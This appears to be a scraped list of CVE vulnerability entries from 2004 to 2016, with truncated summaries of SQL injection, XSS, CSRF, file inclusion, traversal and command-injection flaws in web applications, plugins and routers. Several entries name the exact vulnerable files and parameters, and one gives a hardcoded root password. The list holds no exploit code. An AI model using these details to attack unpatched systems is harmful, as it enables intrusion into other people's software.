02-12-2016 - 22:23 15-01-2016 - 15:59
CVE-2016-1596 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Micro Focus Novell Service Desk before 7.2 allow remote authenticated users to inject arbitrary web script or HTML via a certain (1) user name, (2) tf_aClientFirstName, (3) tf_aClientLastName, (4
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2016-1595 4.0
LiveTime/WebObjects/LiveTime.woa/wa/DownloadAction/downloadFile in Micro Focus Novell Service Desk before 7.2 allows remote authenticated users to conduct Hibernate Query Language (HQL) injection attacks and obtain sensitive information via the entit
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2016-1594 4.0
Micro Focus Novell Service Desk before 7.2 allows remote authenticated users to read arbitrary attachments via a request to a LiveTime.woa URL, as demonstrated by obtaining sensitive information via a (1) downloadLogFiles or (2) downloadFile action.
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2016-1593 6.5
Directory traversal vulnerability in the import users feature in Micro Focus Novell Service Desk before 7.2 allows remote authenticated administrators to upload and execute arbitrary JSP files via a .. (dot dot) in a filename within a multipart/form-
02-12-2016 - 22:21 22-04-2016 - 06:59
CVE-2015-3221 4.0
OpenStack Neutron before 2014.2.4 (juno) and 2015.1.x before 2015.1.1 (kilo), when using the IPTables firewall driver, allows remote authenticated users to cause a denial of service (L2 agent crash) by adding an address pair that is rejected by the i
02-12-2016 - 22:08 26-08-2015 - 15:59
CVE-2015-3141 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Synametrics Technologies Xeams 4.5 Build 5755 and earlier allow remote attackers to hijack the authentication of administrators for requests that create an (1) SMTP domain or a (2) user vi
02-12-2016 - 22:08 20-05-2015 - 15:59
CVE-2015-2845 10.0
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1421902800 allows remote attackers to execute arbitrary commands via the $type portion of the PATH_INFO.
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2844 10.0
The cpanel function in go_site.php in GoAutoDial GoAdmin CE before 3.3-1420434000 allows remote attackers to execute arbitrary commands via the $action portion of the PATH_INFO.
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2843 7.5
Multiple SQL injection vulnerabilities in GoAutoDial GoAdmin CE before 3.3-1421902800 allow remote attackers to execute arbitrary SQL commands via the (1) user_name or (2) user_pass parameter in go_login.php or the PATH_INFO to (3) go_login/validate_
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2842 10.0
Unrestricted file upload vulnerability in go_audiostore.php in the audiostore (Voice Files) upload functionality in GoAutoDial GoAdmin CE 3.x before 3.3-1421902800 allows remote attackers to execute arbitrary code by uploading a file with an executab
02-12-2016 - 22:06 12-05-2015 - 15:59
CVE-2015-2841 5.0
Citrix NetScaler AppFirewall, as used in NetScaler 10.5, allows remote attackers to bypass intended firewall restrictions via a crafted Content-Type header, as demonstrated by the application/octet-stream and text/xml Content-Types.
02-12-2016 - 22:06 03-04-2015 - 10:59
CVE-2015-2838 6.8
Cross-site request forgery (CSRF) vulnerability in Nitro API in Citrix NetScaler before 10.5 build 52.3nc allows remote attackers to hijack the authentication of administrators for requests that execute arbitrary commands as nsroot via shell metachar
02-12-2016 - 22:06 03-04-2015 - 10:59
CVE-2015-2825 7.5
Unrestricted file upload vulnerability in sam-ajax-admin.php in the Simple Ads Manager plugin before 2.5.96 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a dire
02-12-2016 - 22:06 21-04-2015 - 11:59
CVE-2015-2824 7.5
Multiple SQL injection vulnerabilities in the Simple Ads Manager plugin before 2.7.97 for WordPress allow remote attackers to execute arbitrary SQL commands via a (1) hits[][] parameter in a sam_hits action to sam-ajax.php; the (2) cstr parameter in
02-12-2016 - 22:06 06-04-2015 - 11:59
CVE-2015-2805 6.8
Cross-site request forgery (CSRF) vulnerability in sec/content/sec_asa_users_local_db_add.html in the management web interface in Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400, 6855, 6900, 10K, and 6860 with firmware 6.4.5.R02, 6.4.6.R01,
02-12-2016 - 22:06 16-06-2015 - 12:59
CVE-2015-2803 6.0
SQL injection vulnerability in mod1/index.php in the Akronymmanager (sb_akronymmanager) extension before 7.0.0 for TYPO3 allows remote authenticated users with permission to maintain acronyms to execute arbitrary SQL commands via the id parameter.
02-12-2016 - 22:06 17-06-2015 - 14:59
CVE-2015-2746 6.5
The network diagnostics tool (CommandLineServlet) in the Appliance Manager command line utility (CLU) in Websense TRITON 7.8.3 and V-Series appliances before 7.8.4 Hotfix 02 allows remote authenticated users to execute arbitrary commands via shell me
02-12-2016 - 22:05 26-03-2015 - 10:59
CVE-2015-2701 6.8
Cross-site request forgery (CSRF) vulnerability in CS-Cart 4.2.4 allows remote attackers to hijack the authentication of users for requests that change a user password via a request to profiles-update/.
02-12-2016 - 22:05 25-03-2015 - 10:59
CVE-2015-2682 5.0
Citrix Command Center before 5.1 Build 35.4 and 5.2 before Build 42.7 allows remote attackers to obtain credentials via a direct request to conf/securitydbData.xml.
02-12-2016 - 22:05 26-03-2015 - 10:59
CVE-2015-2680 6.8
Cross-site request forgery (CSRF) vulnerability in MetalGenix GeniXCMS before 0.0.2 allows remote attackers to hijack the authentication of administrators for requests that add an administrator account via a request in the users page to gxadmin/index
02-12-2016 - 22:05 23-03-2015 - 12:59
CVE-2015-2679 7.5
Multiple SQL injection vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to execute arbitrary SQL commands via the (1) page parameter to index.php or (2) username parameter to gxadmin/login.php.
02-12-2016 - 22:05 23-03-2015 - 12:59
CVE-2015-2678 4.3
Multiple cross-site scripting (XSS) vulnerabilities in MetalGenix GeniXCMS before 0.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter in the categories page to gxadmin/index.php or (2) page parameter to index
02-12-2016 - 22:05 23-03-2015 - 12:59
CVE-2015-2562 7.5
Multiple SQL injection vulnerabilities in the Web-Dorado ECommerce WD (com_ecommercewd) component 1.2.5 for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) search_category_id, (2) sort_order, or (3) filter_manufacturer_id
02-12-2016 - 22:05 20-03-2015 - 10:59
CVE-2015-2295 6.8
Cross-site request forgery (CSRF) vulnerability in system_firmware_restorefullbackup.php in the WebGUI in pfSense before 2.2.1 allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary files via the del
02-12-2016 - 22:04 10-04-2015 - 11:00
CVE-2015-2292 6.5
Multiple SQL injection vulnerabilities in admin/class-bulk-editor-list-table.php in the WordPress SEO by Yoast plugin before 1.5.7, 1.6.x before 1.6.4, and 1.7.x before 1.7.4 for WordPress allow remote authenticated users to execute arbitrary SQL com
02-12-2016 - 22:04 17-03-2015 - 11:59
CVE-2015-2275 4.3
Cross-site scripting (XSS) vulnerability in WoltLab Community Gallery 2.0 before 2014-12-26 allows remote attackers to inject arbitrary web script or HTML via the parameters[data][7][title] parameter in a saveImageData action to index.php/AJAXProxy.
02-12-2016 - 22:04 12-03-2015 - 13:59
CVE-2015-2248 6.8
Cross-site request forgery (CSRF) vulnerability in the user portal in Dell SonicWALL Secure Remote Access (SRA) products with firmware before 7.5.1.0-38sv and 8.x before 8.0.0.1-16sv allows remote attackers to hijack the authentication of users for r
02-12-2016 - 22:04 01-05-2015 - 11:59
CVE-2015-2237 7.5
Multiple SQL injection vulnerabilities in Betster (aka PHP Betoffice) 1.0.4 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) showprofile.php or (2) categoryedit.php or (3) username parameter in a login to index.php
02-12-2016 - 22:04 12-03-2015 - 13:59
CVE-2015-2218 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the wp_ajax_save_item function in wonderpluginaudio.php in the WonderPlugin Audio Player plugin before 2.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1)
02-12-2016 - 22:04 05-03-2015 - 11:59
CVE-2015-2216 7.5
SQL injection vulnerability in ecomm-sizes.php in the Photocrati theme 4.x for WordPress allows remote attackers to execute arbitrary SQL commands via the prod_id parameter.
02-12-2016 - 22:04 05-03-2015 - 10:59
CVE-2015-2169 4.3
Cross-site scripting (XSS) vulnerability in Zoho ManageEngine AssetExplorer 6.1 service pack 6112 allows remote attackers to inject arbitrary web script or HTML via a Publisher registry entry, which is not properly handled when the machine is scanned
02-12-2016 - 22:04 24-06-2015 - 10:59
CVE-2015-2166 5.0
Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
02-12-2016 - 22:04 06-04-2015 - 11:59
CVE-2010-4279 10.0
The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with "admin" in the loginhash_user parameter, in
02-12-2016 - 21:59 02-12-2010 - 12:15
CVE-2016-2389 7.8
Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter t
30-11-2016 - 22:09 16-02-2016 - 10:59
CVE-2016-2388 5.0
The Universal Worklist Configuration in SAP NetWeaver 7.4 allows remote attackers to obtain sensitive user information via a crafted HTTP request, aka SAP Security Note 2256846.
30-11-2016 - 22:09 16-02-2016 - 10:59
CVE-2016-2386 7.5
SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079.
30-11-2016 - 22:08 16-02-2016 - 10:59
CVE-2016-3976 5.0
Directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 allows remote attackers to read arbitrary files via a ..\ (dot dot backslash) in the fileName parameter to CrashFileDownloadServlet, aka SAP Security Note 2234971.
29-11-2016 - 22:05 07-04-2016 - 19:59
CVE-2016-3974 7.5
XML external entity (XXE) vulnerability in the Configuration Wizard in SAP NetWeaver Java AS 7.1 through 7.5 allows remote attackers to cause a denial of service, conduct SMB Relay attacks, or access arbitrary files via a crafted XML request to _tc~m
29-11-2016 - 22:05 07-04-2016 - 15:59
CVE-2016-2296 7.5
Meteocontrol WEB'log Basic 100, Light, Pro, and Pro Unlimited does not require authentication for "post-admin" login pages, which allows remote attackers to obtain sensitive information or modify data via unspecified vectors.
29-11-2016 - 22:04 14-05-2016 - 12:59
CVE-2015-2102 7.5
SQL injection vulnerability in view_item.php in ClipBucket 2.7 RC3 (2.7.0.4.v2929-rc3) allows remote attackers to execute arbitrary SQL commands via the item parameter.
29-11-2016 - 22:01 27-02-2015 - 10:59
CVE-2015-2090 7.5
SQL injection vulnerability in the ajax_survey function in settings.php in the WordPress Survey and Poll plugin 1.1.7 for Wordpress allows remote attackers to execute arbitrary SQL commands via the survey_id parameter in an ajax_survey action to wp-a
29-11-2016 - 22:01 26-02-2015 - 10:59
CVE-2015-2084 6.8
Cross-site request forgery (CSRF) vulnerability in the Easy Social Icons plugin before 1.2.3 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the ima
29-11-2016 - 22:00 25-02-2015 - 17:59
CVE-2015-2071 4.0
Directory traversal vulnerability in cm/newui/blog/export.jsp in eTouch SamePage Enterprise Edition 4.4.0.0.239 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the filepath parameter.
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2070 7.5
SQL injection vulnerability in eTouch SamePage Enterprise Edition 4.4.0.0.239 allows remote attackers to execute arbitrary SQL commands via the catId parameter to cm/blogrss/feed.
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2068 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2067 5.0
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2015-2065 7.5
SQL injection vulnerability in videogalleryrss.php in the Apptha WordPress Video Gallery (contus-video-gallery) plugin before 2.8 for WordPress allows remote attackers to execute arbitrary SQL commands via the vid parameter in a rss action to wp-admi
29-11-2016 - 22:00 24-02-2015 - 12:59
CVE-2016-8582 7.5
A vulnerability exists in gauge.php of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to execute an arbitrary SQL query and retrieve database information or read local system files via MySQL's LOAD_FILE.
28-11-2016 - 15:40 28-10-2016 - 11:59
CVE-2016-8581 4.3
A persistent XSS vulnerability exists in the User-Agent header of the login process of AlienVault OSSIM and USM before 5.3.2 that allows an attacker to steal session IDs of logged in users when the current sessions are viewed by an administrator.
28-11-2016 - 15:40 28-10-2016 - 11:59
CVE-2016-8580 7.5
PHP object injection vulnerabilities exist in multiple widget files in AlienVault OSSIM and USM before 5.3.2. These vulnerabilities allow arbitrary PHP code execution via magic methods in included classes.
28-11-2016 - 15:40 28-10-2016 - 11:59
CVE-2016-7851 4.3
Adobe Connect version 9.5.6 and earlier does not adequately validate input in the events registration module. This vulnerability could be exploited in cross-site scripting attacks.
28-11-2016 - 15:39 08-11-2016 - 12:59
CVE-2016-6483 5.0
The media-file upload feature in vBulletin before 3.8.7 Patch Level 6, 3.8.8 before Patch Level 2, 3.8.9 before Patch Level 1, 4.x before 4.2.2 Patch Level 6, 4.2.3 before Patch Level 2, 5.x before 5.2.0 Patch Level 3, 5.2.1 before Patch Level 1, and
28-11-2016 - 15:33 01-09-2016 - 21:59
CVE-2016-6186 4.3
Cross-site scripting (XSS) vulnerability in the dismissChangeRelatedObjectPopup function in contrib/admin/static/admin/js/admin/RelatedObjectLookups.js in Django before 1.8.14, 1.9.x before 1.9.8, and 1.10.x before 1.10rc1 allows remote attackers to
28-11-2016 - 15:30 05-08-2016 - 11:59
CVE-2016-5840 9.0
hotfix_upload.cgi in Trend Micro Deep Discovery Inspector (DDI) 3.7, 3.8 SP1 (3.81), and 3.8 SP2 (3.82) allows remote administrators to execute arbitrary code via shell metacharacters in the filename parameter of the Content-Disposition header.
28-11-2016 - 15:29 30-06-2016 - 12:59
CVE-2016-5734 7.5
phpMyAdmin 4.0.x before 4.0.10.16, 4.4.x before 4.4.15.7, and 4.6.x before 4.6.3 does not properly choose delimiters to prevent use of the preg_replace e (aka eval) modifier, which might allow remote attackers to execute arbitrary PHP code via a craf
28-11-2016 - 15:29 02-07-2016 - 21:59
CVE-2016-4469 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.3.9 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) add new repository proxy connectors via the token parameter to
28-11-2016 - 15:18 28-07-2016 - 12:59
CVE-2016-4309 7.6
Session fixation vulnerability in Symphony CMS 2.6.7, when session.use_only_cookies is disabled, allows remote attackers to hijack web sessions via the PHPSESSID parameter.
28-11-2016 - 15:17 30-06-2016 - 13:59
CVE-2016-4264 6.4
The Office Open XML (OOXML) feature in Adobe ColdFusion 10 before Update 21 and 11 before Update 10 allows remote attackers to read arbitrary files or send TCP requests to intranet servers via a crafted OOXML spreadsheet containing an external entity
28-11-2016 - 15:17 01-09-2016 - 19:59
CVE-2016-3473 4.0
Unspecified vulnerability in the BI Publisher (formerly XML Publisher) component in Oracle Fusion Middleware 11.1.1.7.0, 11.1.1.9.0, and 12.2.1.0.0 allows remote authenticated users to affect confidentiality via unknown vectors.
28-11-2016 - 15:09 25-10-2016 - 10:29
CVE-2016-1611 7.2
Novell Filr 1.2 before Hot Patch 6 and 2.0 before Hot Patch 2 uses world-writable permissions for /etc/profile.d/vainit.sh, which allows local users to gain privileges by replacing this file's content with arbitrary shell commands.
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1610 5.0
Directory traversal vulnerability in the email-template feature in Novell Filr before 1.2 Security Update 3 and 2.0 before Security Update 2 allows remote attackers to bypass intended access restrictions and write to arbitrary files via a .. (dot dot
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1609 3.5
Multiple cross-site scripting (XSS) vulnerabilities in Novell Filr before 1.2 Security Update 3 and 2.0 before Security Update 2 allow remote authenticated users to inject arbitrary web script or HTML via crafted input, as demonstrated by a crafted a
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1608 9.0
vaconfig/time in Novell Filr before 1.2 Security Update 3 and 2.0 before Security Update 2 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the ntpServer parameter.
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1607 6.5
Multiple cross-site request forgery (CSRF) vulnerabilities in the administrative interface in Novell Filr before 2.0 Security Update 2 allow remote attackers to hijack the authentication of administrators, as demonstrated by reconfiguring time settin
28-11-2016 - 15:00 31-07-2016 - 22:59
CVE-2016-1337 4.3
Cisco EPC3928 devices allow remote attackers to obtain sensitive configuration and credential information by making requests during the early part of the boot process, related to a "Boot Information Disclosure" issue, aka Bug ID CSCux17178.
28-11-2016 - 14:58 03-07-2016 - 17:59
CVE-2016-1336 7.8
goform/Docsis_system on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long LanguageSelect parameter, related to a "Gateway HTTP Corruption Denial of Service" issue, aka Bug ID CSCuy28100.
28-11-2016 - 14:58 03-07-2016 - 17:59
CVE-2016-1328 7.8
goform/WClientMACList on Cisco EPC3928 devices allows remote attackers to cause a denial of service (device crash) via a long h_sortWireless parameter, related to a "Gateway Client List Denial of Service" issue, aka Bug ID CSCux24948.
28-11-2016 - 14:58 03-07-2016 - 17:59
CVE-2015-8703 4.0
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE and ZXV10 W300 devices W300V1.0.0f_ER1_PE allow remote authenticated users to bypass intended access restrictions, and discover credentials and keys, by reading the configuration file, a dif
28-11-2016 - 14:48 30-12-2015 - 00:59
CVE-2015-7252 4.3
Cross-site scripting (XSS) vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to inject arbitrary web script or HTML via the errorpage parameter.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7251 10.0
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE have a hardcoded password of root for the root account, which allows remote attackers to obtain administrative access via a TELNET session.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7250 7.8
Absolute path traversal vulnerability in cgi-bin/webproc on ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7249 6.8
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allow remote authenticated users to bypass intended access restrictions via a modified request, as demonstrated by leveraging the support account to change a password via a cgi-bin/webproc a
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-7248 5.0
ZTE ZXHN H108N R1A devices before ZTE.bhs.ZXHNH108NR1A.k_PE allow remote attackers to discover usernames and password hashes by reading the cgi-bin/webproc HTML source code, a different vulnerability than CVE-2015-8703.
28-11-2016 - 14:42 30-12-2015 - 00:59
CVE-2015-5066 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the MetalGenix GeniXCMS 0.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) content or (2) title field in an add action in the posts page to index.php or the (3) q par
28-11-2016 - 14:31 24-06-2015 - 10:59
CVE-2015-4533 9.0
EMC Documentum Content Server before 6.7SP1 P32, 6.7SP2 before P25, 7.0 before P19, 7.1 before P16, and 7.2 before P02 does not properly check authorization after creation of an object, which allows remote authenticated users to execute arbitrary cod
28-11-2016 - 14:29 20-08-2015 - 06:59
CVE-2015-3986 4.3
Cross-site request forgery (CSRF) vulnerability in the TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote attackers to hijack the authentication of administrators f
28-11-2016 - 14:27 14-05-2015 - 10:59
CVE-2015-3301 4.0
Directory traversal vulnerability in the TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote administrators to read arbitrary files via a .. (dot dot) in the tcp_box
28-11-2016 - 14:23 14-05-2015 - 10:59
CVE-2015-3300 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allow remote attackers to inject arbitrary web script or HTML via th
28-11-2016 - 14:23 14-05-2015 - 10:59
CVE-2015-1366 4.3
Cross-site scripting (XSS) vulnerability in pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the image_user parameter.
28-11-2016 - 14:18 27-01-2015 - 15:04
CVE-2006-5055 7.5
PHP remote file inclusion vulnerability in admin/testing/tests/0004_init_urls.php in syntaxCMS 1.1.1 through 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the init_path parameter.
28-11-2016 - 14:06 27-09-2006 - 20:07
CVE-2006-4885 7.5
PHP remote file inclusion vulnerability in Shadowed Portal 5.599 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root parameter in (1) footer.php and (2) header.php. NOTE: the provenance of this information is unkn
28-11-2016 - 14:06 19-09-2006 - 17:07
CVE-2006-4714 5.1
PHP remote file inclusion vulnerability in index.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the classified_pat
28-11-2016 - 14:06 12-09-2006 - 12:07
CVE-2006-0206 7.5
Eval injection vulnerability in Light Weight Calendar (LWC) 1.0 (20040909) and earlier allows remote attackers to execute arbitrary PHP code via the date parameter in cal.php, which is included by index.php.
28-11-2016 - 14:06 13-01-2006 - 18:03
CVE-2007-0683 7.5
PHP remote file inclusion vulnerability in includes/functions.php in Omegaboard 1.0beta4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
21-11-2016 - 09:17 02-02-2007 - 20:28
CVE-2006-1252 7.5
Eval injection vulnerability in cal.php in Light Weight Calendar (LWC) 1.0 allows remote attackers to execute arbitrary PHP code via the date parameter to index.php.
18-11-2016 - 22:00 18-03-2006 - 20:02
CVE-2016-8869 7.5
The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4 allows remote attackers to gain privileges by leveraging incorrect use of unfiltered data when registering on a site.
07-11-2016 - 14:15 04-11-2016 - 17:59
CVE-2016-8870 6.8
The register method in the UsersModelRegistration class in controllers/user.php in the Users component in Joomla! before 3.6.4, when registration has been disabled, allows remote attackers to create user accounts by leveraging failure to check the Al
07-11-2016 - 14:15 04-11-2016 - 17:59
CVE-2013-7043 8.3
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via
01-11-2016 - 14:22 10-12-2013 - 14:55
CVE-2006-6552 7.5
PHP remote file inclusion vulnerability in admin/plugins/NP_UserSharing.php in BLOG:CMS 4.1.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the DIR_ADMIN parameter.
17-10-2016 - 23:42 14-12-2006 - 13:28
CVE-2006-5893 7.5
Multiple PHP remote file inclusion vulnerabilities in iWonder Designs Storystream 0.4.0.0 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) mysql.php and (2) mysqli.php in include/classes/pear/DB/.
17-10-2016 - 23:41 14-11-2006 - 17:07
CVE-2006-5768 7.5
Multiple PHP remote file inclusion vulnerabilities in Cyberfolio 2.0 RC1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the av parameter to (1) msg/view.php, (2) msg/inc_message.php, (
17-10-2016 - 23:41 06-11-2006 - 18:07
CVE-2006-5471 7.5
PHP remote file inclusion vulnerability in example/lib/grid3.lib.php in Softerra PHP Developer Library 1.5.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the (1) cfg_dir and (2) lib_dir parameters.
17-10-2016 - 23:41 24-10-2006 - 16:07
CVE-2006-5301 6.8
PHP remote file inclusion vulnerability in includes/antispam.php in the SpamBlockerMODv 1.0.2 and earlier module for phpBB allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
17-10-2016 - 23:41 17-10-2006 - 11:07
CVE-2006-5259 7.5
PHP remote file inclusion vulnerability in param_editor.php in Compteur 2 allows remote attackers to execute arbitrary PHP code via a URL in the folder parameter.
17-10-2016 - 23:41 12-10-2006 - 18:07
CVE-2006-4922 5.0
Unrestricted file upload vulnerability in starnet/editors/htmlarea/popups/images.php in Site@School (S@S) 2.4.02 and earlier allows remote attackers to upload and execute arbitrary files with executable extensions.
17-10-2016 - 23:41 20-09-2006 - 21:07
CVE-2006-4921 7.5
PHP remote file inclusion vulnerability in Site@School (S@S) 2.4.03 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cmsdir parameter to starnet/modules/include/include.php. NOTE: some of these details are obtained f
17-10-2016 - 23:41 20-09-2006 - 21:07
CVE-2006-4920 7.5
Multiple PHP remote file inclusion vulnerabilities in Site@School (S@S) 2.4.02 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the cmsdir parameter to (1) starnet/modules/sn_allbum/slideshow.php, and (2) starnet/themes/e
17-10-2016 - 23:41 20-09-2006 - 21:07
CVE-2006-4369 2.6
Absolute path traversal vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via an absolute pathname in the phpbb_root_path parameter.
17-10-2016 - 23:40 26-08-2006 - 17:04
CVE-2006-4368 7.5
PHP remote file inclusion vulnerability in includes/functions_portal.php in IntegraMOD Portal 2.x and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.
17-10-2016 - 23:40 26-08-2006 - 17:04
CVE-2006-4365 7.5
Multiple PHP remote file inclusion vulnerabilities in VistaBB 2.0.33 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter in (1) includes/functions_mod_user.php or (2) includes/functions_portal.p
17-10-2016 - 23:40 26-08-2006 - 17:04
CVE-2006-3528 6.8
Multiple PHP remote file inclusion vulnerabilities in Simpleboard Mambo module 1.1.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the sbp parameter to (1) image_upload.php and (2) file_upload.php.
17-10-2016 - 23:40 11-07-2006 - 20:05
CVE-2006-0961 7.5
SQL injection vulnerability in yazdir.asp in Cilem Hiber 1.1 allows remote attackers to execute arbitrary SQL commands via the haber_id parameter. NOTE: this product has also been referred to as "Cilem News," although that does not appear to be the
17-10-2016 - 23:39 02-03-2006 - 18:02
CVE-2005-3363 7.5
SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.
17-10-2016 - 23:34 30-10-2005 - 09:34
CVE-2005-2428 5.0
Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password ha
17-10-2016 - 23:27 03-08-2005 - 00:00
CVE-2005-2412 5.0
PHP remote file inclusion vulnerability in block.php in PHP FirstPost allows remote attackers to execute arbitrary PHP code via the Include parameter.
17-10-2016 - 23:26 03-08-2005 - 00:00
CVE-2005-2062 7.5
Multiple SQL injection vulnerabilities in ActiveBuyAndSell 6.2 allow remote attackers to execute arbitrary SQL commands via the catid parameter to (1) default.asp or (2) buyersend.asp, (3) Administrator ID field in admin.asp, E-mail field in (4) adve
17-10-2016 - 23:24 29-06-2005 - 00:00
CVE-2005-1598 7.5
SQL injection vulnerability in Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via a crafted cookie password hash (pass_hash) that modifies the internal $pid variable.
17-10-2016 - 23:21 16-05-2005 - 00:00
CVE-2005-0725 7.5
SQL injection vulnerability in the getAllbyArticle function in wfsfiles.php for WF-Sections (wfsections) 1.07 allows remote attackers to execute arbitrary SQL commands via the articleid parameter to article.php.
17-10-2016 - 23:14 08-03-2005 - 00:00
CVE-2004-1580 7.5
SQL injection vulnerability in index.php in CubeCart 2.0.1 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter.
17-10-2016 - 22:56 31-12-2004 - 00:00
CVE-2004-1553 7.5
SQL injection vulnerability in aspWebAlbum allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the cat parameter to album.asp. NOTE: it was later reported that vector 1 affects aspWebAlbum
17-10-2016 - 22:56 31-12-2004 - 00:00
CVE-2004-1552 7.5
SQL injection vulnerability in aspWebCalendar allows remote attackers to execute arbitrary SQL statements via (1) the username field on the login page or (2) the eventid parameter to calendar.asp.
17-10-2016 - 22:56 31-12-2004 - 00:00
CVE-2008-5308 7.5
The Simple Forum 3.1d module for LoveCMS 1.6.2 Final does not properly restrict access to administrator functions, which allows remote attackers to change the administrator password via a direct request to modules/simpleforum/admin/index.php.
11-10-2016 - 21:59 02-12-2008 - 07:00
CVE-2010-2685 7.5
siteadmin/adduser.php in Customer Paradigm PageDirector CMS does not properly restrict access, which allows remote attackers to bypass intended restrictions and add administrative users via a direct request.
06-10-2016 - 21:59 12-07-2010 - 09:27
CVE-2008-5619 10.0
